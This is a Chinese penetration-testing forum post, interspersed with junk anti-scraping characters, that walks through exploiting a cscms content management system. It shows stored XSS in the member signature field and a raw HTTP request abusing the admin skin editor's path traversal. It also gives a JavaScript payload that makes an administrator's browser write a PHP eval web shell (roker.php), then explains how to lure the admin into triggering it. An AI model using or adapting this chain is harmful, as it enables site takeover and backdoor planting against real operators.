这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题 官网已经修补了,所以重新下了源码 因为 后台登入 还需要认证码 所以 注入就没看了。 存在 xss 漏洞文件 user/member/skin_edit.php 本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:0 q0 X. I2 F- O% ^7 h" j3 i( m # a* Y8 x! |, E. \+ v2 B4 P </span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>0 \5 \4 o* g) A; r4 v8 R $ {: S/ K/ u) J* Y0 F9 |1 q </textarea></td></tr> user/do.php ! s* ?, Q; |, C; r if($op=='zl'){ //资料2 s9 N4 [& Q* R0 E- z5 e, {% U if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) % V+ [* c% Q: e/ T exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);')); % N" k5 M' }9 `7 @3 H $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."', ) M6 `# B, l: {3 a CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."' where CS_Name='".$cscms_name."'"; / K" o# u1 V' X# A! |: w" r if($db->query($sql)){& v$ j/ @8 k, i/ g0 [ 5 E6 {; d$ |6 `; q exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));3 I; k- h; k% h7 d8 C }else{ . e% e8 C* {7 S: i) B. g+ G- J3 ^ exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);')); 2 q8 V* q# l2 B) E* ^, C }0 K! |3 s5 K% `. M4 F/ e. M0 M, K & @+ Q, H, H% d8 s, Z3 q : ?2 n2 K- ~# I& ?3 q, b$ u 没有 过滤导致xss产生。" ]0 R- B5 A* i8 ~9 r( H 后台 看了下 很奇葩的是可以写任意格式文件。。 i/ `0 j: p7 C" |# K7 ` } 抓包。。 , r; f. I X$ ^/ v 本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1! w5 J, ? f, g: k s2 D8 s' s) }# \5 z Accept: text/html, application/xhtml+xml, */* Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php( p) ]" X7 t r3 p% `7 q/ u c 7 V0 o a' m3 P2 V+ B; l Accept-Language: zh-CN ( c2 U( U7 }. d# W% A: A- r- u3 ` User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) ' V. \7 {) `7 E/ H8 G; u Content-Type: application/x-www-form-urlencoded% U( |& k9 n2 ?( a Accept-Encoding: gzip, deflate2 m$ a* H1 U h( t & p8 ~0 U* `( z+ h" ~ Host: 127.0.0.1 Content-Length: 38- _6 J6 U, i. z9 i7 @ 9 _3 f. v& c7 E; q K DNT: 1 Connection: Keep-Alive3 X& r" b& T% f Cache-Control: no-cache* d% p6 c/ r1 m8 z: P4 n& F5 X Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594 name=aaa.php&content=%3Cs%3E%3Ca%25%3E, a; E+ r2 E) c3 L4 h' i 7 R+ p- [6 B0 V9 @3 c 3 K0 U8 ` X8 P% M6 v0 {/ _, U 于是 构造js如下。 本帖隐藏的内容<script> # Z. W7 q" W7 I1 f, U- A8 V O thisTHost = top.location.hostname;4 b* p& u0 D6 l \" | thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";- \8 b9 P0 T5 b. ^3 ~9 q function PostSubmit(url, data, msg) { 8 i. X) @$ s/ ^' [4 a ? var postUrl = url;" [# e; M$ o" [* B3 d8 L3 q 9 } g& d+ R! F: f! e( U2 G9 a. z var postData = data; 9 R3 k) b) y+ v }: } var msgData = msg; - ^# l! {$ o& F var ExportForm = document.createElement("FORM"); document.body.appendChild(ExportForm); / Q: |0 O) m& u$ f9 ^( s ExportForm.method = "POST"; % V* ~$ W7 j" K1 x2 }& p var newElement = document.createElement("input"); newElement.setAttribute("name", "name"); 1 q6 T4 r* J! p) b# j1 R7 L4 U( E newElement.setAttribute("type", "hidden"); : ^" \+ j! b& Q var newElement2 = document.createElement("input"); newElement2.setAttribute("name", "content"); newElement2.setAttribute("type", "hidden"); . {) ^9 Z: k+ g3 c; C ExportForm.appendChild(newElement); ExportForm.appendChild(newElement2); newElement.value = postData; newElement2.value = msgData; : d5 T3 }+ j: b ExportForm.action = postUrl; ExportForm.submit(); " o I+ o4 w" Q* q };0 J L- d* h3 P2 g. L PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>"); </script>4 d* b* v1 R4 s 7 ^ \5 |9 c* }' _ http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入 用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)8 A8 \" |* ]/ R$ H0 U6 z2 P 就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |